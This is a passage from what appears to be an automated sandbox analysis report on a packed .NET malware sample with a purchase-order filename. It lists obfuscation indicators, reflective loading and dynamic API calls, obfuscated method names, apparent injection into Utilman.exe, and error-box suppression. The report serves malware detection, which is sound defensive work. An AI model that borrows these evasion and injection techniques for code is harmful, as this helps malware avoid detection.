                      Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: oDhSPGbJgMIIvl.exe, 00000006.00000000.2215812419.0000000000B4E000.00000002.00000001.01000000.0000000C.sdmp, oDhSPGbJgMIIvl.exe, 00000009.00000002.4557525430.0000000000B4E000.00000002.00000001.01000000.0000000C.sdmp
                      Source: Binary string: wntdll.pdbUGP source: ORDER REF 47896798 PSMCO.exe, 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Utilman.exe, 00000007.00000002.4561884610.00000000050B0000.00000040.00001000.00020000.00000000.sdmp, Utilman.exe, 00000007.00000003.2299005386.0000000004F03000.00000004.00000020.00020000.00000000.sdmp, Utilman.exe, 00000007.00000003.2291191477.0000000004D5B000.00000004.00000020.00020000.00000000.sdmp, Utilman.exe, 00000007.00000002.4561884610.000000000524E000.00000040.00001000.00020000.00000000.sdmp
                      Source: Binary string: wntdll.pdb source: ORDER REF 47896798 PSMCO.exe, ORDER REF 47896798 PSMCO.exe, 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Utilman.exe, Utilman.exe, 00000007.00000002.4561884610.00000000050B0000.00000040.00001000.00020000.00000000.sdmp, Utilman.exe, 00000007.00000003.2299005386.0000000004F03000.00000004.00000020.00020000.00000000.sdmp, Utilman.exe, 00000007.00000003.2291191477.0000000004D5B000.00000004.00000020.00020000.00000000.sdmp, Utilman.exe, 00000007.00000002.4561884610.000000000524E000.00000040.00001000.00020000.00000000.sdmp
                      Source: Binary string: Utilman.pdbGCTL source: ORDER REF 47896798 PSMCO.exe, 00000005.00000002.2290830166.0000000001477000.00000004.00000020.00020000.00000000.sdmp, oDhSPGbJgMIIvl.exe, 00000006.00000002.4557268492.00000000009B2000.00000004.00000020.00020000.00000000.sdmp, oDhSPGbJgMIIvl.exe, 00000006.00000003.2228849768.000000000099B000.00000004.00000020.00020000.00000000.sdmp

                      Data Obfuscation

                      barindex
                      .NET source code contains method to dynamically call methods (often used by packers)
                      Source: 0.2.ORDER REF 47896798 PSMCO.exe.5a90000.2.raw.unpack, DlRvq5yJkomY4LIf3S.cs.Net Code: X2WPMWey8AqqJOPa61l(typeof(Marshal).TypeHandle).GetMethod("GetDelegateForFunctionPointer", new Type[2]{X2WPMWey8AqqJOPa61l(typeof(IntPtr).TypeHandle),typeof(Type)})
                      .NET source code contains potential unpacker
                      Source: 0.2.ORDER REF 47896798 PSMCO.exe.7520000.3.raw.unpack, iaviUev9xV9vXfKHtd.cs.Net Code: yeEpGrFP3n System.Reflection.Assembly.Load(byte[])
                      Source: 0.2.ORDER REF 47896798 PSMCO.exe.41e2a60.1.raw.unpack, iaviUev9xV9vXfKHtd.cs.Net Code: yeEpGrFP3n System.Reflection.Assembly.Load(byte[])
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 0_2_07832541 push eax; ret 0_2_0783254D
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_004148D8 push 00000044h; ret 5_2_004148EB
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_00414A5A pushfd ; ret 5_2_00414A5B
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_00405213 push es; ret 5_2_0040521A
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_00418331 push eax; iretd 5_2_00418338
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0040DB36 push eax; ret 5_2_0040DB39
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_004035E0 push eax; ret 5_2_004035E2
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_00404F13 push cs; ret 5_2_00404F15
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_018D225F pushad ; ret 5_2_018D27F9
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_018D27FA pushad ; ret 5_2_018D27F9
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019009AD push ecx; mov dword ptr [esp], ecx5_2_019009B6
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_018D283D push eax; iretd 5_2_018D2858
                      Source: C:\Windows\SysWOW64\Utilman.exeCode function: 7_2_050B27FA pushad ; ret 7_2_050B27F9
                      Source: C:\Windows\SysWOW64\Utilman.exeCode function: 7_2_050B225F pushad ; ret 7_2_050B27F9
                      Source: C:\Windows\SysWOW64\Utilman.exeCode function: 7_2_050E09AD push ecx; mov dword ptr [esp], ecx7_2_050E09B6
                      Source: C:\Windows\SysWOW64\Utilman.exeCode function: 7_2_050B283D push eax; iretd 7_2_050B2858
                      Source: C:\Windows\SysWOW64\Utilman.exeCode function: 7_2_050B1368 push eax; iretd 7_2_050B1369
                      Source: C:\Windows\SysWOW64\Utilman.exeCode function: 7_2_0321C3B7 push ss; iretd 7_2_0321C406
                      Source: C:\Windows\SysWOW64\Utilman.exeCode function: 7_2_0321C407 push ss; iretd 7_2_0321C406
                      Source: C:\Windows\SysWOW64\Utilman.exeCode function: 7_2_03214D4E push eax; iretd 7_2_03214D55
                      Source: C:\Windows\SysWOW64\Utilman.exeCode function: 7_2_03215375 push edx; iretd 7_2_0321537C
                      Source: C:\Windows\SysWOW64\Utilman.exeCode function: 7_2_032153CA pushfd ; ret 7_2_032153D3
                      Source: C:\Windows\SysWOW64\Utilman.exeCode function: 7_2_03201930 push cs; ret 7_2_03201932
                      Source: C:\Windows\SysWOW64\Utilman.exeCode function: 7_2_03201C30 push es; ret 7_2_03201C37
                      Source: C:\Windows\SysWOW64\Utilman.exeCode function: 7_2_0540F484 push edx; ret 7_2_0540F486
                      Source: C:\Windows\SysWOW64\Utilman.exeCode function: 7_2_0540C7E1 push edi; ret 7_2_0540C81A
                      Source: C:\Windows\SysWOW64\Utilman.exeCode function: 7_2_05410625 push ds; retf 7_2_05410633
                      Source: C:\Windows\SysWOW64\Utilman.exeCode function: 7_2_054101D7 push ecx; retf 7_2_054101F2
                      Source: C:\Windows\SysWOW64\Utilman.exeCode function: 7_2_054101AB push ebx; ret 7_2_054101B1
                      Source: C:\Windows\SysWOW64\Utilman.exeCode function: 7_2_0540F0F1 push ss; ret 7_2_0540F10F
                      Source: C:\Windows\SysWOW64\Utilman.exeCode function: 7_2_054073C9 push ss; ret 7_2_054073CF
                      Source: ORDER REF 47896798 PSMCO.exeStatic PE information: section name: .text entropy: 7.753164497880348
                      Source: 0.2.ORDER REF 47896798 PSMCO.exe.5a90000.2.raw.unpack, DlRvq5yJkomY4LIf3S.csHigh entropy of concatenated method names: 'kZ9YdQeiiHN6iHHplRr', 'wEfHEVeR3qXSbOkcscO', 'RLbYs7foSU', 'PW2e71euAk0VMGlpcQV', 'gjVptie4PJx3mKSamWn', 'LKcyQ4eq4Fn8S34m92l', 'RgtTUJcyZL', 'TBNYf2t1gt', 'NdiYZfNUem', 'u6GYH5kC76'
                      Source: 0.2.ORDER REF 47896798 PSMCO.exe.5a90000.2.raw.unpack, vH9V9oD7tIKkmfHnnj.csHigh entropy of concatenated method names: 'CO1Gqr7JX', 'O7OmLZJsW', 'AEjTXD5ed', 'DjTcZUKVY', 'V5WOgiNs3', 'ri688DDjg', 'pN9ncriqM', 'x0i4vkLXV', 'aFLjtabv9', 'zVDpUJsTO'
                      Source: 0.2.ORDER REF 47896798 PSMCO.exe.7520000.3.raw.unpack, NOIBYUnYgtFK7pKYCu.csHigh entropy of concatenated method names: 'DlSwrG82mh', 'PGAwJN76hT', 'IiAwfgVjwL', 'LGswn77n1f', 'k7EwTrdk8K', 'kmyw4pK3bS', 'H8EwKsrbBe', 'hHDw55x81s', 'ImAwSxGRX8', 'py4wxbLn4k'
                      Source: 0.2.ORDER REF 47896798 PSMCO.exe.7520000.3.raw.unpack, Xog1FY1fUcZdwyj6YO.csHigh entropy of concatenated method names: 'XWx7fayOa7', 'Pay7nD5gMR', 'W6j7gpNYXM', 'jVC7BDRf3w', 'SRC7Nlad6x', 'QvF7Xmn80k', 'WOq79XFInV', 'vYr7MOroQc', 'zbv7Dh8K5w', 'vs47cwyYdS'
                      Source: 0.2.ORDER REF 47896798 PSMCO.exe.7520000.3.raw.unpack, aY8cTYZ0LsTcFCmbjlt.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'NCAxcZu7g4', 'ImkxE34QFP', 'Hufx1RmOiB', 'iTsxdhmdJa', 'PrGxolAEgF', 'NQjxFCQgSo', 'vAOxtiTPa7'
                      Source: 0.2.ORDER REF 47896798 PSMCO.exe.7520000.3.raw.unpack, iaviUev9xV9vXfKHtd.csHigh entropy of concatenated method names: 'Tu9iqtufF4', 'D5jiULnTwj', 'dhsi2F3HLE', 'c2GiwA27J2', 'crFiWxXEO2', 'zxeiQfZ6p9', 'MW2i8yr1vx', 'B66ivdkhwx', 'qN5iVIBDui', 'KbUiyrLTB6'
                      Source: 0.2.ORDER REF 47896798 PSMCO.exe.7520000.3.raw.unpack, GIZLM2hyoSkFDi6LHb.csHigh entropy of concatenated method names: 'exKSgDcikf', 'iCASBSTQoQ', 'xhDSkntoPr', 'SGrSNaJSoH', 'PKfSXpMurj', 'wbpSHj4HTh', 'QC6S9mQxEC', 'U1vSMvpT61', 'OseSeJkO1H', 'STpSDfufKa'
                      Source: 0.2.ORDER REF 47896798 PSMCO.exe.7520000.3.raw.unpack, qRFt1xpUZB7uIhqJrD.csHigh entropy of concatenated method names: 'cYRZ8VyNmF', 'iHFZvtrghU', 'fYgZytFK7p', 'qYCZIuJwAj', 'mEvZTKLP5E', 'hXyZ4cZW63', 'Tmor1V1Zp22eLdwl0h', 'KqQAmhAyio2OhbbY92', 'jODZZhIcEN', 'XeHZiRh6X0'
                      Source: 0.2.ORDER REF 47896798 PSMCO.exe.7520000.3.raw.unpack, WVyNmFfWHFtrghUQ4t.csHigh entropy of concatenated method names: 'j7e2dBD1sM', 'k302ogQN6i', 'sRU2FlIWl1', 'Ux72tb4D4n', 'oDH2YlVclg', 'Sse2jQkhFo', 'ps22R9yGan', 'Vq92PRyQmx', 'Kyg2hIsYyD', 'WTh2A5eeh3'
                      Source: 0.2.ORDER REF 47896798 PSMCO.exe.7520000.3.raw.unpack, wdeyBdenPbCNp1NoWJ.csHigh entropy of concatenated method names: 'SYi8lZTiZt', 'yQ18Li9Rin', 'dUv8GyRDR4', 'bGL8rvD8Fg', 'LIv8b06ZF5', 'Kh28JColTw', 'q8h8sarNtj', 'ei78fBpuha', 'pcO8n9iauE', 'lZB8666uBS'
                      Source: 0.2.ORDER REF 47896798 PSMCO.exe.7520000.3.raw.unpack, EiGHJW2wRU8D1VUSab.csHigh entropy of concatenated method names: 'Dispose', 'XhhZh7lboQ', 'PtvOB5Dy0P', 'MDXNegGhOW', 'IOuZAZksj7', 'XH4ZzunELq', 'ProcessDialogKey', 'rPgO0IZLM2', 'loSOZkFDi6', 'yHbOOLGJdN'
                      Source: 0.2.ORDER REF 47896798 PSMCO.exe.7520000.3.raw.unpack, yGJdNEAjgLRfgWF8nJ.csHigh entropy of concatenated method names: 'j8BxwE4Ktb', 'VXmxWKCR1B', 'j7ExQZo8E5', 'Lxcx8h0XKK', 'vdDxSOmBEq', 'mvoxvHtLy3', 'Next', 'Next', 'Next', 'NextBytes'
                      Source: 0.2.ORDER REF 47896798 PSMCO.exe.7520000.3.raw.unpack, QHaysSwyBxpRO63SLU.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'twxOheJAKB', 'CEYOAMFAiy', 'sMBOzCdkJe', 't4Ti0eLvHa', 'SCQiZTB6er', 'jGLiO8QPtN', 'ayriiOphvn', 'zAibmk5VMbZXypkfIB7'
                      Source: 0.2.ORDER REF 47896798 PSMCO.exe.7520000.3.raw.unpack, tnltDQtmY55ymiPeuF.csHigh entropy of concatenated method names: 'WvoKy7MPsb', 'vTQKIPRI8v', 'ToString', 'tjaKUJ4OLW', 'Jp4K2OmLP7', 'iLyKwc6Tci', 'n3nKWt4rfb', 'xeoKQQCh9N', 'wHEK8BQD93', 'M3GKvodZC3'
                      Source: 0.2.ORDER REF 47896798 PSMCO.exe.7520000.3.raw.unpack, f2RrapOuUxWZMZ3oNB.csHigh entropy of concatenated method names: 'VgNGfa0Tm', 'n1ErPEHLQ', 'RKXJwn5XM', 'HFIsl5YH7', 'S7bn5KA06', 'oYE67mQ41', 'YAVKiPomD29PXfkd0v', 'kslG0phbKXMnpNFLjx', 'G0r5tOx5A', 'nPjxKfv6h'
                      Source: 0.2.ORDER REF 47896798 PSMCO.exe.7520000.3.raw.unpack, tqcls1BsFIoWP2B70p.csHigh entropy of concatenated method names: 'vTVduQpwANt1ndk9Fyd', 'DUXKbMpxexHZMc2Cy1W', 'eoAQ5vyrf1', 'YZOQSSmDsP', 'N6CQx2ZM4I', 'PaPECwpJkLEYj9aKbRw', 'rC1xKGpqwdcFIuw0h2c'
                      Source: 0.2.ORDER REF 47896798 PSMCO.exe.7520000.3.raw.unpack, W5EwXygcZW63gCVw6T.csHigh entropy of concatenated method names: 'QhoQqGVNIY', 'BelQ2HiAVV', 'bh7QWWs4c5', 'LG6Q89tjXK', 'pr7QvtCk78', 'nLXWYyDDDm', 'nHcWjsNSmV', 'vUBWR76nkv', 'NOsWPI6yRv', 'fcHWhXdhle'
                      Source: 0.2.ORDER REF 47896798 PSMCO.exe.7520000.3.raw.unpack, W4Rke9jS3n4Dqfmcae.csHigh entropy of concatenated method names: 'FYxKPjVXLU', 'GVmKASFRJQ', 'YvO50L5l8P', 'HTK5ZQ0mUG', 'nl4KcvkUiG', 'HbmKEd0ml3', 'O5TK1Ox9fZ', 'oDJKdC1NNx', 'oqiKopwOj8', 'mVcKFridMA'
                      Source: 0.2.ORDER REF 47896798 PSMCO.exe.7520000.3.raw.unpack, URdXGgRYmhhh7lboQk.csHigh entropy of concatenated method names: 'wWKSTpjLII', 'BFxSKpb6N6', 'TgNSSfVTXg', 'mKkSCaxc20', 'GkNSmmuFiN', 'EM4Suin66t', 'Dispose', 'Wtx5U5RsXA', 'Y0752dllit', 'mNd5wySREI'
                      Source: 0.2.ORDER REF 47896798 PSMCO.exe.7520000.3.raw.unpack, iT8vdP9ynmNm67blAv.csHigh entropy of concatenated method names: 'Htt8UYaBsT', 'FuM8wCrkwA', 'Rsf8QolO6V', 'unOQArt8yp', 'gc5QzVgmsb', 'CL680t303N', 'mQE8ZoKPVf', 'xHc8OBHSPb', 'J0L8iDANbm', 'xLk8pZLLiH'
                      Source: 0.2.ORDER REF 47896798 PSMCO.exe.7520000.3.raw.unpack, CwAjHg6KAaffPIEvKL.csHigh entropy of concatenated method names: 'mLmWbkgEHG', 'xPxWs4JTuK', 'dw1wk2sJeu', 'U6twNJHi4J', 'gOZwXNK0Ip', 'eRRwH4iVeV', 'fC6w9K0by9', 'kCHwMs2CKv', 'hAawew1GGv', 'aakwDIio51'
                      Source: 0.2.ORDER REF 47896798 PSMCO.exe.7520000.3.raw.unpack, HgOmuNZZj0vObDopIP3.csHigh entropy of concatenated method names: 'RhNxA4hxwS', 'lodxz8ZwFv', 'BJeC0hi836', 'gaXCZaujG1', 'AHPCOdB6L9', 'u20CiO5t7n', 'TmxCpNhL2P', 'SCRCqCUwkZ', 'PfTCU5jvaM', 'KqaC2wnudi'
                      Source: 0.2.ORDER REF 47896798 PSMCO.exe.7520000.3.raw.unpack, axW4hOdVgLfr4v5736.csHigh entropy of concatenated method names: 'fHMTDdg4nt', 'uWtTE5dyvV', 'PRXTdDWivr', 'Lr2TofrApe', 'VmeTB0Vweh', 'coaTklDu7u', 'Bp7TNJlM1F', 'GwkTXxVei8', 'xRrTHNnl91', 'pJaT9udwI0'
                      Source: 0.2.ORDER REF 47896798 PSMCO.exe.7520000.3.raw.unpack, Gr7yhszNpUuDBdrE9I.csHigh entropy of concatenated method names: 'kJKxJUqeIX', 'bD2xf3Mt6U', 'IWXxnausBv', 'q6LxgTs7Ji', 'lZlxBijF7q', 'QobxNd1koK', 'gagxXEgld5', 'fLCxu4sdxi', 'IU6xl0Fhek', 'RAkxL5uUbd'
                      Source: 0.2.ORDER REF 47896798 PSMCO.exe.41e2a60.1.raw.unpack, NOIBYUnYgtFK7pKYCu.csHigh entropy of concatenated method names: 'DlSwrG82mh', 'PGAwJN76hT', 'IiAwfgVjwL', 'LGswn77n1f', 'k7EwTrdk8K', 'kmyw4pK3bS', 'H8EwKsrbBe', 'hHDw55x81s', 'ImAwSxGRX8', 'py4wxbLn4k'
                      Source: 0.2.ORDER REF 47896798 PSMCO.exe.41e2a60.1.raw.unpack, Xog1FY1fUcZdwyj6YO.csHigh entropy of concatenated method names: 'XWx7fayOa7', 'Pay7nD5gMR', 'W6j7gpNYXM', 'jVC7BDRf3w', 'SRC7Nlad6x', 'QvF7Xmn80k', 'WOq79XFInV', 'vYr7MOroQc', 'zbv7Dh8K5w', 'vs47cwyYdS'
                      Source: 0.2.ORDER REF 47896798 PSMCO.exe.41e2a60.1.raw.unpack, aY8cTYZ0LsTcFCmbjlt.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'NCAxcZu7g4', 'ImkxE34QFP', 'Hufx1RmOiB', 'iTsxdhmdJa', 'PrGxolAEgF', 'NQjxFCQgSo', 'vAOxtiTPa7'
                      Source: 0.2.ORDER REF 47896798 PSMCO.exe.41e2a60.1.raw.unpack, iaviUev9xV9vXfKHtd.csHigh entropy of concatenated method names: 'Tu9iqtufF4', 'D5jiULnTwj', 'dhsi2F3HLE', 'c2GiwA27J2', 'crFiWxXEO2', 'zxeiQfZ6p9', 'MW2i8yr1vx', 'B66ivdkhwx', 'qN5iVIBDui', 'KbUiyrLTB6'
                      Source: 0.2.ORDER REF 47896798 PSMCO.exe.41e2a60.1.raw.unpack, GIZLM2hyoSkFDi6LHb.csHigh entropy of concatenated method names: 'exKSgDcikf', 'iCASBSTQoQ', 'xhDSkntoPr', 'SGrSNaJSoH', 'PKfSXpMurj', 'wbpSHj4HTh', 'QC6S9mQxEC', 'U1vSMvpT61', 'OseSeJkO1H', 'STpSDfufKa'
                      Source: 0.2.ORDER REF 47896798 PSMCO.exe.41e2a60.1.raw.unpack, qRFt1xpUZB7uIhqJrD.csHigh entropy of concatenated method names: 'cYRZ8VyNmF', 'iHFZvtrghU', 'fYgZytFK7p', 'qYCZIuJwAj', 'mEvZTKLP5E', 'hXyZ4cZW63', 'Tmor1V1Zp22eLdwl0h', 'KqQAmhAyio2OhbbY92', 'jODZZhIcEN', 'XeHZiRh6X0'
                      Source: 0.2.ORDER REF 47896798 PSMCO.exe.41e2a60.1.raw.unpack, WVyNmFfWHFtrghUQ4t.csHigh entropy of concatenated method names: 'j7e2dBD1sM', 'k302ogQN6i', 'sRU2FlIWl1', 'Ux72tb4D4n', 'oDH2YlVclg', 'Sse2jQkhFo', 'ps22R9yGan', 'Vq92PRyQmx', 'Kyg2hIsYyD', 'WTh2A5eeh3'
                      Source: 0.2.ORDER REF 47896798 PSMCO.exe.41e2a60.1.raw.unpack, wdeyBdenPbCNp1NoWJ.csHigh entropy of concatenated method names: 'SYi8lZTiZt', 'yQ18Li9Rin', 'dUv8GyRDR4', 'bGL8rvD8Fg', 'LIv8b06ZF5', 'Kh28JColTw', 'q8h8sarNtj', 'ei78fBpuha', 'pcO8n9iauE', 'lZB8666uBS'
                      Source: 0.2.ORDER REF 47896798 PSMCO.exe.41e2a60.1.raw.unpack, EiGHJW2wRU8D1VUSab.csHigh entropy of concatenated method names: 'Dispose', 'XhhZh7lboQ', 'PtvOB5Dy0P', 'MDXNegGhOW', 'IOuZAZksj7', 'XH4ZzunELq', 'ProcessDialogKey', 'rPgO0IZLM2', 'loSOZkFDi6', 'yHbOOLGJdN'
                      Source: 0.2.ORDER REF 47896798 PSMCO.exe.41e2a60.1.raw.unpack, yGJdNEAjgLRfgWF8nJ.csHigh entropy of concatenated method names: 'j8BxwE4Ktb', 'VXmxWKCR1B', 'j7ExQZo8E5', 'Lxcx8h0XKK', 'vdDxSOmBEq', 'mvoxvHtLy3', 'Next', 'Next', 'Next', 'NextBytes'
                      Source: 0.2.ORDER REF 47896798 PSMCO.exe.41e2a60.1.raw.unpack, QHaysSwyBxpRO63SLU.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'twxOheJAKB', 'CEYOAMFAiy', 'sMBOzCdkJe', 't4Ti0eLvHa', 'SCQiZTB6er', 'jGLiO8QPtN', 'ayriiOphvn', 'zAibmk5VMbZXypkfIB7'
                      Source: 0.2.ORDER REF 47896798 PSMCO.exe.41e2a60.1.raw.unpack, tnltDQtmY55ymiPeuF.csHigh entropy of concatenated method names: 'WvoKy7MPsb', 'vTQKIPRI8v', 'ToString', 'tjaKUJ4OLW', 'Jp4K2OmLP7', 'iLyKwc6Tci', 'n3nKWt4rfb', 'xeoKQQCh9N', 'wHEK8BQD93', 'M3GKvodZC3'
                      Source: 0.2.ORDER REF 47896798 PSMCO.exe.41e2a60.1.raw.unpack, f2RrapOuUxWZMZ3oNB.csHigh entropy of concatenated method names: 'VgNGfa0Tm', 'n1ErPEHLQ', 'RKXJwn5XM', 'HFIsl5YH7', 'S7bn5KA06', 'oYE67mQ41', 'YAVKiPomD29PXfkd0v', 'kslG0phbKXMnpNFLjx', 'G0r5tOx5A', 'nPjxKfv6h'
                      Source: 0.2.ORDER REF 47896798 PSMCO.exe.41e2a60.1.raw.unpack, tqcls1BsFIoWP2B70p.csHigh entropy of concatenated method names: 'vTVduQpwANt1ndk9Fyd', 'DUXKbMpxexHZMc2Cy1W', 'eoAQ5vyrf1', 'YZOQSSmDsP', 'N6CQx2ZM4I', 'PaPECwpJkLEYj9aKbRw', 'rC1xKGpqwdcFIuw0h2c'
                      Source: 0.2.ORDER REF 47896798 PSMCO.exe.41e2a60.1.raw.unpack, W5EwXygcZW63gCVw6T.csHigh entropy of concatenated method names: 'QhoQqGVNIY', 'BelQ2HiAVV', 'bh7QWWs4c5', 'LG6Q89tjXK', 'pr7QvtCk78', 'nLXWYyDDDm', 'nHcWjsNSmV', 'vUBWR76nkv', 'NOsWPI6yRv', 'fcHWhXdhle'
                      Source: 0.2.ORDER REF 47896798 PSMCO.exe.41e2a60.1.raw.unpack, W4Rke9jS3n4Dqfmcae.csHigh entropy of concatenated method names: 'FYxKPjVXLU', 'GVmKASFRJQ', 'YvO50L5l8P', 'HTK5ZQ0mUG', 'nl4KcvkUiG', 'HbmKEd0ml3', 'O5TK1Ox9fZ', 'oDJKdC1NNx', 'oqiKopwOj8', 'mVcKFridMA'
                      Source: 0.2.ORDER REF 47896798 PSMCO.exe.41e2a60.1.raw.unpack, URdXGgRYmhhh7lboQk.csHigh entropy of concatenated method names: 'wWKSTpjLII', 'BFxSKpb6N6', 'TgNSSfVTXg', 'mKkSCaxc20', 'GkNSmmuFiN', 'EM4Suin66t', 'Dispose', 'Wtx5U5RsXA', 'Y0752dllit', 'mNd5wySREI'
                      Source: 0.2.ORDER REF 47896798 PSMCO.exe.41e2a60.1.raw.unpack, iT8vdP9ynmNm67blAv.csHigh entropy of concatenated method names: 'Htt8UYaBsT', 'FuM8wCrkwA', 'Rsf8QolO6V', 'unOQArt8yp', 'gc5QzVgmsb', 'CL680t303N', 'mQE8ZoKPVf', 'xHc8OBHSPb', 'J0L8iDANbm', 'xLk8pZLLiH'
                      Source: 0.2.ORDER REF 47896798 PSMCO.exe.41e2a60.1.raw.unpack, CwAjHg6KAaffPIEvKL.csHigh entropy of concatenated method names: 'mLmWbkgEHG', 'xPxWs4JTuK', 'dw1wk2sJeu', 'U6twNJHi4J', 'gOZwXNK0Ip', 'eRRwH4iVeV', 'fC6w9K0by9', 'kCHwMs2CKv', 'hAawew1GGv', 'aakwDIio51'
                      Source: 0.2.ORDER REF 47896798 PSMCO.exe.41e2a60.1.raw.unpack, HgOmuNZZj0vObDopIP3.csHigh entropy of concatenated method names: 'RhNxA4hxwS', 'lodxz8ZwFv', 'BJeC0hi836', 'gaXCZaujG1', 'AHPCOdB6L9', 'u20CiO5t7n', 'TmxCpNhL2P', 'SCRCqCUwkZ', 'PfTCU5jvaM', 'KqaC2wnudi'
                      Source: 0.2.ORDER REF 47896798 PSMCO.exe.41e2a60.1.raw.unpack, axW4hOdVgLfr4v5736.csHigh entropy of concatenated method names: 'fHMTDdg4nt', 'uWtTE5dyvV', 'PRXTdDWivr', 'Lr2TofrApe', 'VmeTB0Vweh', 'coaTklDu7u', 'Bp7TNJlM1F', 'GwkTXxVei8', 'xRrTHNnl91', 'pJaT9udwI0'
                      Source: 0.2.ORDER REF 47896798 PSMCO.exe.41e2a60.1.raw.unpack, Gr7yhszNpUuDBdrE9I.csHigh entropy of concatenated method names: 'kJKxJUqeIX', 'bD2xf3Mt6U', 'IWXxnausBv', 'q6LxgTs7Ji', 'lZlxBijF7q', 'QobxNd1koK', 'gagxXEgld5', 'fLCxu4sdxi', 'IU6xl0Fhek', 'RAkxL5uUbd'

                      Hooking and other Techniques for Hiding and Protection

                      barindex
                      Loading BitLocker PowerShell Module
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
